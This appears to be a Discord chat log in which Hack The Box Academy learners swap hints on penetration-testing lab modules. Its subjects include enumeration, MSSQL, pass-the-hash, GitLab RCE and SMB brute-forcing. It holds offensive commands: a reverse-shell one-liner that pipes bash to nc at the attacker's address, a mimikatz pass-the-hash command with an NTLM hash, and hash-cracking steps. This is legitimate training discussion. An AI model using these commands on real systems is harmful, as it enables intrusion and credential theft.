you have to compile the payload.c into a new binary and link it with dsquery, but then you cannot set SUID on the compiled binary and change ownership to root
sqsh isn't installed
If you're just here to bitch about it, no one cares. If you want to foster growth for the module/community leave some /feedback and provide some positive criticism about the section.
lol i did not like this specific module, Attacking Common Services. there is no point in putting this module as we already studied the port enum in the starting module and the labs are absolutely not good: that FTP challenge, 8 times out of 10 it did not show that port, and in this sql attack module the sqsh commands are not working properly
yes
feedback like the one people give for Thick Client apps ? Section is the same, despite multiple people complaining about it
but there is some diff in commands for both tools
yea they are different tools, so you'll have to learn the syntax. mssqlclient.py is an impacket script, so it shouldn't be too hard to figure out
I used sqsh for the second question as mssqlclient wasn't working for me
the MSSQL commands will obviously be the same though
mssqlclient automates enabling xp_cmdshell
huh. two different sides
so it's easier to use
seems more convenient than easier
Xoriath asks the realest questions 😹
https://academy.hackthebox.com/module/134/section/1200
Web attacks
Chaining IDOR Vulnerabilities
Change the admins email to flag@idor.htb and you will get the flag
I changed the email but there's no flag anywhere..? any ideas?
Hi everyone, currently stuck on Advanced XSS and CSRF Exploitation skills assessment where I managed to extract the admin.php page and find the hidden API but keep getting ||{"error":"Please specify a customer ID"}||, tried fuzzing bunch of params but none worked, any hints? Managed to solve, DM if help required
Wait until you reach linux lpe, I really thought the entire path was super high quality until this one. Check juggernaut security blog, if you do not get some of the sections, it really helped me
nvm i found it, terrible wording for this question
Sounds like you need to enumerate the API's database.
You can DM me
Will do
That's been a while but iirc open it up and there's a test notification button
Yeah that's in the lesson but not in the task
which one?
Attack common application prtg network monitor
guys i got the credentials for alex in Footprinting Lab - Medium.. tried everything through rdp to find the other user for mysql login... but am stuck here
anyone have done this lab before ?
Nvm figured it out
trying to find out the right parameter to enumerate the API, have tried fuzzing it
I'm still struggling on this one.
I've tried:
||1. dnsenum --dnsserver 10.129.203.140 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt internal.inlanefreight.htb
2. dnsenum --dnsserver 10.129.203.140 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt app.inlanefreight.htb
3. dnsenum --dnsserver 10.129.203.140 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt ns.inlanefreight.htb
4. dnsenum --dnsserver 10.129.203.140 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt mail1.inlanefreight.htb
Also tried:
┌─[eu-academy-1]─[]─[htb-ac-537556@htb-bwgchqgqcu]─[~]
└──╼ [★]$ for sub in $(cat /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt );do dig $sub.internal.inlanefreight.htb @10.129.203.140 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
┌─[eu-academy-1]─[]─[htb-ac-537556@htb-bwgchqgqcu]─[~]
└──╼ [★]$ for sub in $(cat /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt );do dig $sub.app.inlanefreight.htb @10.129.203.140 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
┌─[eu-academy-1]─[]─[htb-ac-537556@htb-bwgchqgqcu]─[~]
└──╼ [★]$ for sub in $(cat /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt );do dig $sub.ns.inlanefreight.htb @10.129.203.140 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
||
Can anyone point me in the right direction? 🤕
there are more than the 3 subdomains you have showcased in your example
Nvm I got it
why?
might be a longshot but is there a space between MS and I? my eyes could also be misconfigured
Try to use -force
find Write-UserAddMSI in the PS module to see if it's actually there. could have been renamed
I imported the wrong script, my mistake.
Can someone do a sanity check for my AEAD Skills Assessment 1? Having problems with msfconsole/socket
It's the mssql one ?
Find an interesting file
After you rdp
Hey anyone got errors installing droopescan to solve the joomla discovery enumeration section?
Try the docker version
https://github.com/SamJoan/droopescan
Is there anyone I can PM for help with regards to Windows Privilege Escalation Skill Assessment I ?
Just send it here
I am not able to get a foothold, can you give me a nudge?
I'm unsure of how to use command injection to get back a reverse shell
I tried to upload to the victim via certutil -urlcache -f but it always returns an error
what is the difference between Pass the Hash and Pass the Keys?
i've got the ntlm hash of a domain joined user and got access to his share on the domain, so i can also use Pass the keys, which is actually the hash i will send to the KDC, then what is the difference?
in the module, after getting the keys, we perform pass the key as:
mimikatz # sekurlsa::pth /domain:inlanefreight.htb /user:plaintext /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f
see here we also used ntlm, so how is it different
unsure what you mean by pass the key
like pass the ticket?
i guess the difference lies in authentication and authorization
The Overpass The Hash/Pass The Key (PTK) attack is designed for environments where the traditional NTLM protocol is restricted, and Kerberos authentication takes precedence. This attack leverages the NTLM hash or AES keys of a user to solicit Kerberos tickets, enabling unauthorized access to resources within a network.
A Pass-the-Hash (PtH) attack is a technique where an attacker captures a password hash (as opposed to the password characters) and then passes it through for authentication and lateral access to other networked systems. With this technique, the threat actor doesn’t need to decrypt the hash to obtain a plain text password. PtH attacks exploit the authentication protocol, as the password's hash remains static for every session until the password is rotated.
honestly it looks a lot like ptt
but if anyone can explain it better let me know
i think it is like authentication: the domain joined user knows his authentication and encrypts the timestamp with his password hash, and then the key is what we send to the kdc to authenticate ourselves. it is sooo similar to pass the hash
In an overpass-the-hash attack, an adversary leverages the NTLM hash of a user account to obtain a Kerberos ticket that can be used to access network resources.
it's a different thing, pth doesn't touch kerberos so it's simply a way to authenticate, whereas with overpass-the-hash or ptk you can create or forge tickets based on the ntlm hash and abuse the authorization
if that makes sense
hmm makes a lot sense
This video explains what a Pass the Hash attack is and demonstrates how an attacker can leverage the LanMan or NTLM hash of a user’s password to authenticate to a directory or resource without ever obtaining the user’s plaintext password.
To learn more about this attack and how to mitigate, detect and respond to it, go to: https://www.netwrix.co...
i might be really wrong and dont quote me, but thats what i got from the blogs i've read so far
yeah this is correct
deleted the above messages because i caught myself trying to explain things in different ways leading to the same result 😒
Can anyone give a nudge with regards to gaining a reverse shell through the command injection flaw in Windows Privilege Skills Assessment I ?
so I know that it is vulnerable to the ||&&|| and tried to use certutil to upload ||nc.exe|| but it does not work
I have also tried various shells from revshells but it does not execute
if you have rce why not use a powershell reverse shell?
oh thank you
i didnt think about that
cant sign into greenbone | module: vulnerability assessment | section: OpenVAS assessment skills
oh oops i see why LOL
Hi, I have a question about the "Getting Started" module of the "Penetration Tester" path. The problem is that the web page doesn't load. I think it has to do with the configuration of /etc/hosts but I don't quite understand what's going on. Does anyone have any idea?
sure, can you send the /etc/hosts file?
or what you have in there
it might be an issue with the spacing of the ip and domain name
I cannot send screenshot
127.0.0.1 localhost
127.0.1.1 debian12-parrot
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 localhost
127.0.1.1 htb-yfgfxasr0l htb-yfgfxasr0l.htb-cloud.com
under 127.0.1.1 u wanna put in the IP address and then the domain after.
IP = your target
so 127.0.1.1 is the IP, debian12-parrot is the host. example:
10.129.92.5 http://www.hackthebox.com/
now if you navigate to "http://hackthebox.com/" it'll be responsive on google
this is just an example URL varies on what your machine tells you to go to
and how can i know the domain? they only give me this 94.237.60.34:39332
is this the right channel to ask for help on questions?
Does it have anything to do with this data? -> Connected to htb-yfgfxasr0l:1 (htb-ac-1463051)
u dont need to use the host file then. Just go to the "http://94.237.60.34:39332"
Module: Information Gathering- web edition
Section: Subdomain enumeration
Brute-force vhosts on the target system. What is the full subdomain that is prefixed with "web"? Answer using the full domain, e.g. "x.inlanefreight.htb"
I've tried:
- ran command
gobuster vhost -u http://83.136.255.40:35863 -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain inlanefreight.htb
- edited /etc/hosts file and put the <generated ip without port number> inlanefreight.htb - the command produces no result
on your google, make sure you're connected to the openvpn config too
sudo gobuster dns -w wordListPath -d inlanefreight.htb
try this
see if a domain comes up
Is this channel not for asking questions about modules? I'm new to Discord
u use this channel to get support with the modules u need
sorry it just said discussing modules i wasnt sure if there was a dedicated questions one
time to time someone will be here to assist
Im doing that, but it does not load
check if ur connected to the openvpn config
file extension is ".ovpn"
make sure thats running
send an ss of your host file, what's inside it?
did you access the provided IP on firefox?
use "http://94.237.60.34:39332" and make sure nothing in your host file is interfering with the ip you've given
yes, at the VM
to send screenshot, read and follow #welcome
Same zero results.
i fw that name i love that
payloadbunny is a fire user
and does it load up any web page?
nono
which section is it exactly?
One of the first, "Basic Tools"
Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host.
can i know what are the first modules to begin with?
Any advice?
You don't really have to make any edits in /etc/hosts, you are just supposed to grab the banner
did the section teach you anything about it? ||Hint: it did||
InfoSec Foundation is a skill path which I would highly suggest
alright thanks
nothing came
Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host.
Any advice I did not understand the question
Ah, thanks, I've solved it now. I understood that I had to find a banner on a website. My English is not very good. Sorry for the inconvenience.
Its alright, dw about it
Stuck in attacking common applications section attacking gitlab q2 gain rce
tried to find the user name, tried password spraying, password bruteforce, created a new user.
Unable to guess the password for the user and with the created account can't get the rce
anyone know how to fix this "Job for ssh.service failed because the control process exited with error code.
See "systemctl status ssh.service" and "journalctl -xeu ssh.service" for details."
Module: Footprinting
Section: IPMI
Question: What is the account's cleartext password?
So I have used metasploit setting the OUTPUT_HASHCAT_FILE and get a ipmi_hash.hash, which is nice. Then I do,
||hashcat -m 7300 -a 0 /tmp/ipmi_hash.hash /usr/share/wordlists/rockyou.txt --user ||
And: * Device #1: Not enough allocatable device memory for this attack.
😢
just run hashcat in your host
find the user with gitlab_usernum.py
Found the user name
ok now use the default password provide on the section
Once you've found the common password*, use these credentials for your rce with the Poc gitlab_13_10_2_rce.py
can anyone tell me, in HTB ctf i want to participate in the upcoming ctf but it asks for an input key, what is that??
I have tried all the default passwords that are provided in this section. And if the name is case sensitive I have tried it with them as well
which password did you try?
Hey guys, currently on Module 7 - Password attacks, attacking NTDS.dit section. I'm a bit confused with this line:
To make a copy of the NTDS.dit file, we need local admin (Administrators group) or Domain Admin (Domain Admins group) (or equivalent) rights.
But when I search online whether its possible to make a copy of NTDS.dit with only local admin rights, it shows Access to ntds.dit is highly restricted because it contains sensitive data, including hashed passwords. Only domain administrators or those with equivalent privileges, such as system administrators on a domain controller, would be able to interact with the ntds.dit file.
password1 Password1 password 123 Password123 Welcome1 welcome1
ahahah the password is here. It's up to you to find the right one and use the PoC correctly.
What is your question; is it confusion between which is necessary to access NTDS.dit: Local Admin vs Domain Admin? As I understand it, there is no distinction between "local" and "domain" authentication after you upgrade a server to become a domain controller. Local authentication on a DC becomes functionally equivalent to authenticating through the domain, you're just doing it locally instead of accessing the DC over a network.
Help me, stuck here for 2 days
i mean local admins on an active directory joined host
not the domain controller
Local authentication still functions as expected on domain-joined hosts. The NTDS.dit file, however, only exists on domain controllers.
python3 [POC].py -t [url] -u [user] -p [pass] -c 'rm /tmp/f; mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc [YOUR_IP] [PORT_LISTENER] > /tmp/f '
oh yeah ofcofc
never thought of that
thanks!
Is the user name case sensitive
which username did you find ?
web fuzzing - skills assessment - Question "After completing all steps in the assessment, you will be presented with a page that contains a flag in the format of HTB{...}. What is that flag?" - Did a simple FUZZ scan, found 4 dirs ( htpasswd 403, hta 403, htaccess 403, admin 301, server-status 403 ) so it's admin (permission declined) - tried fuzzing /admin - found (hta, htpasswd, htaccess, index.php) so it's index.php - "ACCESS DENIED" - tried fuzzing /index.php - everything is valid ?? - tried filtering everything - no response ? - what am i doing wrong ??? _ plz help ( it's suggested to use common.txt )
There is only one question in the skills assessment
YO !! Help plz ??
not sure what module you're on but did you try fuzzing headers? request body data, etc?
we're talking ffuf right? @cedar zinc ^
I didn’t do this section but with ffuf you can try to find directories recursively: -recursion -recursion-depth -1 -e .php
Module : Web fuzzing - I don't know how to fuzz headers, body request or any of that & it's out of scope for the room...
Hi, I'm unable to bruteforce SMB using hydra (apparently because it doesn't support smb2?) Any other alternatives?
netexec supports smb better in my experience
-H 'HOST: FUZZ.htb.com' or if you have specified a POST request to fuzz a parameter with a key, you do -X POST -d 'id=key' -H 'Content-Type: application/x-www-form-urlencoded'
oh yeah this works
but pretty slow, even with 64 threads
That can often be the server slow to respond. Sometimes I try other services in tandem to see if they're faster since creds are shared.
ah
btw, do u use netexec instead of hydra
this tool seems better
I use both, but netexec does seem better in a few ways.
Use them interchangeably and you'll develop a preference for one tool or another that largely depending on what you're doing at the moment.
okay, thanks a lot again :)
My Windows Host?
you crack the hash on your attacking machine, not on the remote machine 🙂
English 🙂
ahah sorry, I saw France and my French came out directly
Yeah i understood it
i'm experiencing network problem with "The learning process module" , i am connected to the VPN server, but whenever i try to exploit the machine using my attacking machine, the target will crash or disconnect. any solution?
you have to download the vpn in tcp mode
Currently having trouble with a question in the linux fundamentals module.
I need to list all services and the interfaces they listen on; most of the networking commands provided on the cheatsheet (I've tried lsof, ifconfig, ss, ps) do not provide enough information.
Any advice, linux power users?
ss -lntp ?
hmm, no interfaces
i presume in that context they are talking about something like eth0, ens192, lo, right?
ah tried ss -tuln sorry
with lsof you can use lsof -i -P -n
yeah already tried that from an internet guide, unfortunately need sudo to do that
providing the section and question would be useful
for me, I am not going through linux fundamentals, but when we talk about services and interfaces these are the commands that I use
ok, take a look in:
https://academy.hackthebox.com/module/18/section/80
(Linux Fundamentals - filter contents - Q1)
tbf idk how to even read the output 😅 , all i see is a bunch of protocols and addresses, whilst im trying to look for more process names and network interfaces
netstat -tulpn
either ss -tunap or netstat -punta will do, you don't need to find the process names or interfaces, just count all interfaces open ports
0.0.0.0 is the ip for all interfaces
yep, though i feel like the next question sort of flows from first... and you need to identify the user behind the FTP server
nice
netstat -ln4 | grep LISTEN | grep -v 127 | wc -l was the command in my notes
why remove everything with 127?
localhost ip
why not google it
idk about the rest, im quite new aswell, just started fundamentals and on networking (but I have been a software engineer for about a year now), -ln4 merges the -l for listening and -n numeric flags to list services listening with numeric addresses using ipv4
hot damn
Hello guys i am doing the AD Enumeration and Attacks skills assessment. i have a meterpreter shell on a host on the AD internal network, i need to figure out access to a host named "MS01", i tried starting a socks proxy and nmapping the network (proxychains nmap -Pn -sV -sC 172.16.6.0/244 -p 139,445) and it gave me nothing. how do i figure out which host is MS01? (i did an arp-scan using meterpreter and it showed that there are only 3 hosts, 1 is mine, the other one is probably MS01 and the other is the DC.,, i wanna know how i would figure this out if there were many hosts?)
Password Attacks | Pass the ticket from linux. Both of Julio's tickets expire in 2022 and the system date is set to 2024
Are you sure you checked both? It was my experience that while one was expired the other was not. I don't recall the specifics, if this was for julio or another user, however.
It's easy to goof setting the environ and accidentally check one ticket twice.
I am stuck and I am not sure how to get around it. Apart from crackmap, is there a way I could get around it or is there specific version of crackmap that I should use. I am aware that I can use the id_rsa; however, it seems that I need to login with jason account in order to log in
Attacking common services smb
Sorry you are right, so foolish of me
My notes do suggest it's julio. You're on the right track.
you are right
I did it at least 3 times myself 🤣
Cheers brother thanks a lot
This is one challenge where you almost need to look at the hints. They remind you there are resources you can download for a module.
oh yes I downloaded the password list
I can't paste a photo here
password list from the resources
😦
Ok, good. It sounds like you know what you need to do... now how are you going to do it? If you have a question, lmk.
Also, if you haven't followed the directions in #welcome that's why you can't paste screenshots.
I can't say with certainty that they restrict images, but I'm guessing it's a restriction for new users until they agree to the rules & link their account.
oh thank you so much sorry I am a little new with discord
it's ok. get linked up and ask any questions.
Did you add it to your /etc/hosts?
thank you 😄
settled already
I am stuck with attacking SMB part, not sure if my crackmap version is a wrong one
I tried hydra but can't
Don't use -d
Also that's not the domain anyway
Also highly suggest using netexec instead of crackmap
I was using local-auth cos I am aware it is a workgroup
but not sure why
there is this article https://academy.hackthebox.com/module/116/section/1169
they crack it with -d
so I tried my luck
-d is for the domain
PIVOTING, TUNNELING, AND PORT FORWARDING/ICMP Tunneling with SOCKS. So I had the same problem with the previous module last night where the provided download git link isn't compatible with the target box (am using pwnbox). I'm getting this error: ./ptunnel-ng: error while loading shared libraries: libcrypto.so.3: cannot open shared object file: No such file or directory. So I think I need to find a compatible version of ptunnel. What's the best way to go about doing this? like what am i looking for to match the download version to the target host?
Also that's not an article, just an example from the module
oh amazing
thank you marcielee
i will try it
Also you can provide a wordlist to the -u option
Instead of individually trying usernames
Any idea how to read the flag then ?
did you ask gpt?
Don't connect to C$
Isn't the task to connect to //DC01/julio?
Yes
Yes
Also: don't use -c
It's what the module uses, but why not?
Just see what happens
Also it may be that the ticket you're using is invalid
The example doesn't always mirror what you can or can't do
what am i missing boss?